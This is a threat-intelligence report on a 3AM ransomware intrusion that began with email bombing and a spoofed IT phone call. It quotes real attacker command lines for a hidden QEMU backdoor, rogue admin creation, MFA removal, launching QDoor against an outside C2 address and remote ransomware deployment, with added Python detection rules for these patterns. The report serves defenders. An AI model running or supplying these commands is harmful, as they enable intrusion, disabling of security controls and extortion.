Ransomware is usually a crime of opportunity. Attackers typically strike through an easily discovered vulnerability or security weakness: unpatched Internet-facing software, vulnerable network edge devices, or exposed inbound virtual private network (VPN) ports lacking multifactor authentication are among the most common points of initial compromise. However, some attacks are much more targeted and include significant pre-attack reconnaissance and the identification of specific employees of the organization as targets.
Sophos has been tracking multiple ransomware actors leveraging an attack pattern first reported by Microsoft in May 2024 in connection with the threat group designated Storm-1811: using “email bombing” to overload a targeted organization’s employee with unwanted emails, and then making a voice or video call over Microsoft Teams posing as a tech support team member to deceive that employee into allowing remote access to their computer. Between November 2024 and mid-January 2025, Sophos documented two distinct threat clusters using these techniques in over 15 incidents. Further hunting has found over 55 attempted attacks using this technique.
In the first quarter of 2025, Sophos Incident Response aided an organization targeted by attackers affiliated with the 3AM ransomware group. In many ways the pattern followed other email bombing attacks, but several aspects of the attack set it apart from previous Teams “vishing” incidents connected to the two threat clusters Sophos had previously associated with these tactics.
In this case, the attacker used a phone call that spoofed the phone number of the organization’s IT department. The attack included deployment of a virtual machine on a compromised computer, giving the attackers an initial foothold hidden from the view of endpoint protection software. The ransomware attack itself was thwarted, but the attackers were able to stay on the network for 9 days before attempting to launch ransomware, and they succeeded in stealing data from the targeted organization’s network.
Before the attack, the 3AM actors performed reconnaissance of the organization, gathering the email addresses of company employees and the phone number of the organization’s internal IT department. They used this information to tailor their attack.
3AM Ransomware
First reported by Symantec in September 2023, 3AM has been assessed by researchers at Intrinsic and other organizations to be a rebranding of BlackSuit / Royal ransomware, and connected to one of the core “teams” of the disbanded Conti group. Mentioned in the BlackBasta ransomware chat log leaks, 3AM has ties to the BlackBasta-affiliated actors involved in the Microsoft Teams-based vishing that Sophos MDR tracks as STAC5777.

The voice phishing techniques used by 3AM actors in this case and in STAC5777 cases were discussed in the BlackBasta leaks. A full script for vishing phone operators was posted in the chat in May 2024; research into using vishing began in the fall of 2023, when the actors began purchasing Microsoft Teams accounts. Around that time, the BlackBasta threat actors tested out an open source tool called “TeamsPhisher.”
Day 1 and 2
Initial compromise and deployment of backdoor
The attack commenced with email bombing. Employee email addresses obtained during reconnaissance were used to subscribe to multiple email lists. On day one of the attack, the primary targeted employee received 24 unsolicited emails within a 3-minute period.
As the emails began to arrive, the threat actor called the employee’s telephone via voice over IP, spoofing the phone number of the company’s IT department. Using the emails as a pretext, the threat actor socially engineered the employee into granting them remote access to their computer using Microsoft Quick Assist.
Microsoft Quick Assist has the benefit of being installed by default on Windows 10 (version 1607 and later) and Windows 11 systems, though in recent updates Microsoft moved Quick Assist to the Microsoft Store, requiring an update or reinstall from the Store to activate it. If installed, it can be launched with a keyboard shortcut (Ctrl+Windows Key+Q).
The employee was convinced by the fake call and provided the attacker access via Quick Assist. The threat actor used the already running session of Chrome to open a new tab and navigate to a recently created domain that spoofed one tied to Microsoft and Quick Assist (msquick[.]link). The site redirected to a one-time text message service (1ty[.]me), which was used to pass a URL to a Google Drive folder containing an archive named UpdatePackage_excic.zip. This archive was extracted into the directory \ProgramData\UpdatePackage_exic\.
Defense evasion and initial command and control
In the payload were a VBS script (Update.vbs), a Qemu emulator binary, and a virtual disk.
The threat actor launched the VBS script from the command prompt, which launched a Windows 7 virtual machine within the Qemu emulator, connecting it to the targeted system’s network interface (MITRE ATT&CK technique T1610, Deploy Container):
“C:\ProgramData\UpdatePackage_excic\wexe” -m 4096 -hda Update_excic.qcow2 -netdev user,id=mynet0 -device e1000,netdev=mynet0 -cpu max -display none
A QDoor trojan was pre-installed on the Windows 7 virtual machine. QDoor, first reported by ConnectWise in September 2024, is a network tunneling backdoor that uses the Qt networking libraries. It connected through the Qemu client’s binding to the targeted device’s network adapter to a hardcoded IP address (88.118.167[.]239:443). This address was documented both in the BlackSuit ransomware case reported by ConnectWise and in a Lynx ransomware attack that leveraged QDoor observed by Sophos Managed Detection and Response. The address is associated with an Internet service provider in Lithuania.
This backdoor allowed the threat actor to establish a foothold on the targeted organization’s network while evading detection by Sophos XDR endpoint software. Qemu did not require installation, so no administrative privileges were needed for deployment, and application control for virtual machines was not enabled.
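As an added illustration (not Sophos detection logic), the following Python rule flags a process launch whose argument set looks like QEMU, regardless of the binary's name, when it is headless, uses user-mode networking through the host's stack, or runs from a user-writable path. The event format, sample command lines, placeholder binary name and trusted install roots are all constructed assumptions.

```python
import shlex

# Constructed sample process-creation events; the first mimics the pattern in this
# incident with a placeholder binary name, the second is a legitimate desktop VM
SAMPLE_EVENTS = [
    {"host": "WS-17", "user": "jdoe",
     "cmd": r'"C:\ProgramData\UpdatePackage\update.exe" -m 4096 -hda disk.qcow2 '
            r'-netdev user,id=mynet0 -device e1000,netdev=mynet0 -cpu max -display none'},
    {"host": "DEV-02", "user": "build",
     "cmd": r'"C:\Program Files\qemu\qemu-system-x86_64.exe" -m 2048 -hda test.qcow2 -display sdl'},
    {"host": "WS-03", "user": "asmith", "cmd": r'"C:\Windows\System32\notepad.exe" notes.txt'},
]
QEMU_FLAGS = {"-m", "-hda", "-drive", "-netdev", "-device", "-cpu", "-display"}
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")  # assumed install roots

def tokenize(cmd):
    # posix=False keeps backslashes literal; strip the quotes shlex leaves on tokens
    return [t.strip('"') for t in shlex.split(cmd, posix=False)]

def vm_indicators(cmd):
    """Return the reasons a command line looks like a hidden, host-bridged VM launch."""
    tokens = tokenize(cmd)
    image = tokens[0].lower()
    flags = {}
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-"):
            flags.setdefault(tok.lower(), []).append(tokens[i + 1].lower())
    if len(QEMU_FLAGS & set(flags)) < 3:
        return []  # not a QEMU-style argument set; the binary name is deliberately ignored
    reasons = []
    if not image.startswith(TRUSTED_ROOTS):
        reasons.append("emulator run from a user-writable path")
    if "none" in flags.get("-display", []):
        reasons.append("headless VM (-display none)")
    if any(v.split(",")[0] == "user" for v in flags.get("-netdev", [])):
        reasons.append("user-mode networking through the host's network stack")
    return reasons

def scan(events):
    """Return (host, user, reasons) for every event that trips the rule."""
    alerts = []
    for e in events:
        reasons = vm_indicators(e["cmd"])
        if reasons:
            alerts.append((e["host"], e["user"], reasons))
    return alerts
```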
At this point, the Microsoft Quick Assist session was terminated, as the threat actor had established direct communication and control.
Discovery, lateral movement and persistence
Using tools within the QEMU virtual machine, the attacker compromised a domain services account. Five hours after the initial compromise, the threat actor used that account and the Windows Management Instrumentation Command-line utility (WMIC) to execute PowerShell on one of the organization’s servers.
Leveraging PowerShell, the threat actor ran the following commands to see which accounts had active user sessions on the server, create a new account on that system and add the account to the local Administrators group:
exe net1 localgroup administrators
net1 localgoup Administrators [targeted organization name]SupportUser /add
net1 user [targeted organization name]SupportUser Gr@@@ndbabis11 /add
net1 localgroup Administrators [targeted organization name]SupportUser /add
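An added example, not from the report: correlating the two-step pattern above (a local user created, then added to Administrators on the same host) across constructed process-creation events. The misspelled localgroup attempt is not matched, just as it failed on the server; host names, user names and the password are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (ISO time, host, command line); not incident data
SAMPLE_EVENTS = [
    ("2025-02-10T14:02:11", "SRV-FILE01", "net1 localgroup administrators"),
    ("2025-02-10T14:02:40", "SRV-FILE01", "net1 localgoup Administrators CorpSupportUser /add"),
    ("2025-02-10T14:03:05", "SRV-FILE01", "net1 user CorpSupportUser Constructed-Pw1 /add"),
    ("2025-02-10T14:03:30", "SRV-FILE01", "net1 localgroup Administrators CorpSupportUser /add"),
    ("2025-02-10T09:15:00", "WS-44", "net user svc_backup /add"),
    ("2025-02-10T16:30:00", "WS-44", "net localgroup Administrators svc_backup /add"),
]

# net or net1, optionally with a path or .exe; the password argument is optional
USER_ADD = re.compile(
    r"^(?:.*\\)?net1?(?:\.exe)?\s+user\s+(?P<name>\S+)\s+(?:\S+\s+)?/add\b", re.I)
# "localgoup" (the typo in the incident) fails here just as it failed on the server
ADMIN_ADD = re.compile(
    r"^(?:.*\\)?net1?(?:\.exe)?\s+localgroup\s+administrators\s+(?P<name>\S+)\s+/add\b", re.I)

def find_rogue_admins(events, window=timedelta(minutes=10)):
    """Pair each local 'user /add' with a later Administrators add on the same host."""
    created = {}  # (host, lowercase user name) -> creation time
    alerts = []
    for ts, host, cmd in sorted(events):
        t = datetime.fromisoformat(ts)
        m = USER_ADD.match(cmd)
        if m:
            created[(host, m["name"].lower())] = t
            continue
        m = ADMIN_ADD.match(cmd)
        if m:
            key = (host, m["name"].lower())
            if key in created and t - created[key] <= window:
                alerts.append((host, m["name"], ts))
    return alerts
```

Widening the window trades precision for recall: the WS-44 pair seven hours apart is only reported when the window covers it.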
The threat actor then used the newly created local administrator account to establish a Remote Desktop session on the server. To establish additional external access, the attacker installed a commercial remote machine management (RMM) tool, XEOXRemote, which leverages XEOX’s cloud portal.
In the time following this activity, a domain administrator account was also compromised. Unfortunately, no forensic artifacts were available to explain how that compromise occurred. As domain administrator, the attacker executed the following discovery commands on the compromised server:
C:\Windows\system32\control.exe netconnections
ipconfig /all
C:\Windows\system32\net1 sessions
net group "domain Admins" /domain
wmic product get name, version
exe quser /server:[internal ip address]
quser /server:[internal ip address]
quser
nltest /DOMAIN_TRUSTS
nltest /dclist:
whoami /all
The attacker also used the ping command to test connectivity to a number of hosts on the network. Over the remainder of the incident, the attacker used the compromised domain administrator account to move laterally to nine other hosts on the network and ran similar discovery commands on those systems. The results of those commands were saved in several files (pc.txt, dir.txt and a1.txt); pc.txt contained a list of internal IP addresses. Multiple other hosts had a C:\ProgramData\d.bat file dropped on them, which would enable RDP in the registry and open a firewall
Early on the second day, the attacker abandoned the initial foothold and shut down the QEMU emulator. All subsequent activity was conducted through Remote Desktop for interactive sessions, and through XEOX and WMIC for remote execution of commands and binaries.
Day 3
(Failed) defense evasion
The targeted organization had previously installed Sophos XDR endpoint protection across all devices except for one server. Multifactor authentication was implemented for RDP access for all user accounts. These measures frustrated further efforts by the threat actor to move laterally.
MFA prevented the threat actor from establishing interactive sessions over RDP. However, it did not protect against the continued use of WMIC and remote PowerShell activity.
The attacker attempted to uninstall MFA three different ways, which were all unsuccessful:
Via a WMIC command:
wmic product where "name=Duo Authentication for Windows Logon x64" call uninstall /nointeractive
Via a WMIC command nested within a Scheduled Task designed to run under the system context:
SCHTASKS /s [internal IP address] /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c wmic product where name="Duo Authentication for Windows Logon x64" call uninstall /nointeractive" /sc ONCE /sd 01/01/2025 /st 00:00
This task name is one used in a Conti playbook leaked by a disgruntled Conti affiliate in 2021. It could easily be changed at no cost to the threat actors, yet it is still being used by former Conti affiliates four years later.
Via an MsiExec command to uninstall MFA based on the Product ID:
- msiexec /X [Duo Product ID] /qn /norestart
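An added example (not Sophos code) showing why detection of these three uninstall vectors must look through wrappers: the rule peels cmd /c, schtasks /tr and wmic process call create layers before checking the innermost command for wmic product ... call uninstall or msiexec /X. The sample command lines, the product GUID placeholder and the product watchlist are constructed.

```python
import re

# Constructed command lines; the GUID is a placeholder and the product strings are samples
SAMPLES = [
    'wmic product where "name=Duo Authentication for Windows Logon x64" call uninstall /nointeractive',
    'SCHTASKS /s 10.0.0.5 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c wmic product '
    'where name="Duo Authentication for Windows Logon x64" call uninstall /nointeractive" /sc ONCE',
    'msiexec /X {PLACEHOLDER-PRODUCT-GUID} /qn /norestart',
    'msiexec /i C:\\Temp\\agent.msi /qn',
    'wmic /node:"SRV-APP02" process call create "cmd /c msiexec /x {PLACEHOLDER-PRODUCT-GUID} /qn"',
]
WATCHLIST = ("duo authentication", "sophos")  # assumed list of products whose removal matters

# Each wrapper pattern exposes the command it hands off to as the 'inner' group
WRAPPERS = [
    re.compile(r'^(?:.*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+"?(?P<inner>.+?)"?$', re.I),
    re.compile(r'^schtasks\b.*\s/tr\s+"(?P<inner>.+)"\s+/(?:sc|sd|st|ru|rl)\b', re.I),
    re.compile(r'^wmic\b.*?\bprocess\s+call\s+create\s+"(?P<inner>.+)"\s*$', re.I),
]
UNINSTALL = [
    re.compile(r'\bwmic\b.*\bproduct\b.*\bcall\s+uninstall\b', re.I),
    re.compile(r'\bmsiexec(?:\.exe)?\b.*\s/(?:x|uninstall)\b', re.I),
]

def unwrap(cmd):
    """Peel wrapper layers until the innermost command is reached; return every layer."""
    layers = [cmd.strip()]
    while True:
        for pat in WRAPPERS:
            m = pat.match(layers[-1])
            if m:
                layers.append(m["inner"].strip())
                break
        else:
            return layers

def classify(cmd):
    """Describe a software-removal attempt found at any wrapper depth, or None."""
    layers = unwrap(cmd)
    inner = layers[-1]
    if not any(p.search(inner) for p in UNINSTALL):
        return None
    return {
        "uninstall": inner,
        "silent": bool(re.search(r'/(?:nointeractive|qn|quiet)\b', inner, re.I)),
        # GUID-only removals need a separate product-code lookup, not shown here
        "watched": any(w in cmd.lower() for w in WATCHLIST),
        "via": [layer.split()[0].lower() for layer in layers[:-1]],
    }
```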
The attacker additionally made efforts to disable Sophos endpoint protection on two servers by attempting to deploy EDR Sandblaster (an “EDR killer”). This was also unsuccessful.
Exfiltration
On two hosts, the threat actor installed a legitimate cloud synchronization tool called GoodSync, which is compatible with Microsoft, Google, Amazon, Dropbox, and other services. They then used GoodSync to upload approximately 868 GB of data from those servers to the cloud storage provider Backblaze.
Day 5
Blocked backdoor deployment
The attacker accessed another server and remotely installed a remote access tool called Syncro Live Agent (now branded as Syncro XMM), which evidence suggests the threat actor never used. They also deployed two copies of the QDoor remote access trojan onto the disk, named vol.exe and svchost.exe to disguise them, via WMIC commands:
- wmic /node:"[hostname]" process call create "cmd /c C:\ProgramData\vol.exe 172.86.121[.]134"
- wmic /node:[local IP address] process call create "cmd /c C:\ProgramData\svchost.exe "172.86.121[.]134""
Both vol.exe and svchost.exe were copies of the same malicious binary already identified, detected and prevented from executing by Sophos as QDoor malware.
Day 9
Failed lateral movement
The attackers continued to try to gain access to additional systems through RDP, but were repeatedly blocked by MFA controls. Eventually, they found an unmanaged device, the one server with no endpoint protection, and leveraged it to launch a remote 3AM ransomware attack against the network.
(Limited) Impact
The threat actor deployed the ransomware binary as C:\L.exe on the unmanaged device, as well as a batch file (1.bat) containing commands to target 88 computers on the network. The batch file attempted to map to the C drive of each of the identified hosts. Example command taken from 1.bat:
- start 1l L.exe -k [ransomware portal access key] -s 10 -m net -p \\[host IP address]\c$
Sophos endpoint’s CryptoGuard feature prevented remote encryption on the systems that had Sophos protection installed, identifying the remote activity as ransomware. The impact of the ransomware was mostly limited to the unmanaged host the ransomware was executed from.
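An added example, not taken from the report, of detecting the fan-out pattern the batch file above produces: a single source connecting to the C$ or ADMIN$ share of many distinct hosts within minutes. The share-access records are constructed in a simplified form of the Security event 5140 fields; the thresholds are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed share-access records (ISO time, source IP, server, share name), loosely
# modelled on Security event 5140 fields; none of these values come from the incident
SAMPLE_EVENTS = (
    # one source touching C$ on twelve different hosts inside two minutes
    [(f"2025-02-18T03:01:{i * 7:02d}", "10.10.5.9", f"HOST-{i:02d}", "\\\\*\\C$") for i in range(8)]
    + [(f"2025-02-18T03:02:{i * 7:02d}", "10.10.5.9", f"HOST-{i + 8:02d}", "\\\\*\\C$") for i in range(4)]
    # a backup server reaching ADMIN$ on three hosts, hours apart
    + [(f"2025-02-18T0{h}:00:00", "10.10.1.2", f"HOST-{h:02d}", "\\\\*\\ADMIN$") for h in (1, 2, 4)]
    # ordinary access to a data share
    + [("2025-02-18T03:01:30", "10.10.7.3", "FS-01", "\\\\*\\Finance")]
)
ADMIN_SHARES = {"C$", "ADMIN$"}

def admin_share_fanout(events, min_hosts=8, window=timedelta(minutes=5)):
    """Return (source, window start, distinct hosts) for sources that reach
    administrative shares on at least min_hosts different hosts within window."""
    by_source = defaultdict(list)
    for ts, src, host, share in events:
        if share.rsplit("\\", 1)[-1].upper() in ADMIN_SHARES:
            by_source[src].append((datetime.fromisoformat(ts), host))
    alerts = []
    for src, hits in by_source.items():
        hits.sort()  # chronological, so every candidate window starts at an observed hit
        for i, (t0, _) in enumerate(hits):
            hosts = {h for t, h in hits[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                alerts.append((src, t0.isoformat(), len(hosts)))
                break  # one alert per source is enough
    return alerts
```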

Conclusions
Defenders should take the following steps to prevent or mitigate the results of these threat actor techniques, tools and procedures:
Build employee awareness
Vishing attacks, such as this 3AM incident and other recent ransomware actor attacks, depend upon deception and on leveraging a targeted individual’s confusion and sense of urgency, driven by events they do not expect, such as an onslaught of unwanted emails suddenly disrupting their workday. Educate staff on exactly how IT support will contact them, under what circumstances, and which tools they will use to provide remote technical support, so that staff can recognize social engineering efforts more easily.
Audit administrative and service accounts
Enforce complexity of passwords, limit access by policy to prevent misuse if compromised, and ensure there is no password reuse across administrative accounts. Regularly audit administrative accounts and disable local administrator accounts. Follow Microsoft’s guidelines for least-privilege administrative models. Additionally, if service accounts cannot have multifactor authentication enabled for specific technical reasons, they should be restricted to specific log-on times and have their privileges limited to only those required for their tasks.
Deploy policy-driven application control for software and scripts
Extended detection and response (XDR) protection tools, such as those provided by Sophos, allow for policy-driven blocking of legitimate executables that are unwanted within an organization’s IT estate. Identify which software tools are in legitimate use within your organization and block those that are not expected. Execution of products (including QEMU and other virtual machines, remote machine management software and remote control software) can be restricted to specific users or devices. Also restrict the use of PowerShell through execution policies to specific administrative accounts. Prevent untrusted code from executing through digital signature verification, and set the PowerShell execution policy to run only signed scripts.
Implement MFA for and place strict controls on remote access
Use of an MFA product helped restrict lateral movement and remote access in this case; organizations should do all they can to strengthen authentication for remote access, and to limit which systems can be accessed from outside the network through policies and network segmentation.
Use network filtering and network intrusion prevention to block unwanted remote access
Block access to ports associated with remote access to critical segments of the network, restricting remote desktop access to servers specifically designated for that task. Use IPS filters to block inbound and outbound network traffic that could be connected to remote control, backdoors and data exfiltration. Create detections and alerts that are triggered by this type of activity.
Lock down Windows Registry editing
Restrict who can modify hives or keys in the Windows Registry related to settings that can impact, or be used to bypass, security software and policies.
Indicators of compromise from this attack will be posted to the Sophos GitHub.
Acknowledgements
Sophos X-Ops thanks Nathan Mante, Harinder Bhathal and Michael Warner of Sophos Incident Response for their contributions to this report.